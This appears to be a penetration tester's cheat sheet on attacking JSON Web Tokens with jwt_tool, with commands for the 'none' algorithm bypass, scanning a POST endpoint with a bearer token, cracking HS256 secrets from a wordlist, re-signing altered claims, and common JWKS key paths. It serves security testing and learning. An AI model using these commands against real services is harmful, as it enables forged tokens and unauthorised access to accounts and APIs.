# JWT Tool

## Structure

<https://auth0.com/docs/secure/tokens/json-web-tokens/json-web-token-structure>

## Debugger

Best online tool is <https://token.dev> JWT debugger.

{% embed url="<https://token.dev>" %}

## JWT Tool

<https://github.com/ticarpi/jwt_tool>

<https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology>

## Signature Verification Attacks

### Algorithm None Bypass

```
./jwt_tool.py JWT_TOKEN -X a
```

### Token attacks on POST data endpoint

```
python3 ./jwt_tool.py -M pb -t http:/URL/api/method  -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"
```

### HS256 - HMAC secret cracking

```bash
python3 ./jwt_tool.py JWTTOKEN --crack --dict /path/wordlist/secrets.txt

# modify payload claims
python3 ./jwt_tool.py JWTTOKEN --sign hs256 --password secret -T
```

### RS256 - Find public Key

Searching public key for cracking the primary key

<https://github.com/ticarpi/jwt_tool/wiki/Finding-Public-Keys>

```
/.well-known/jwks.json
/openid/connect/jwks.json
/jwks.json
/api/keys
/api/v1/keys
```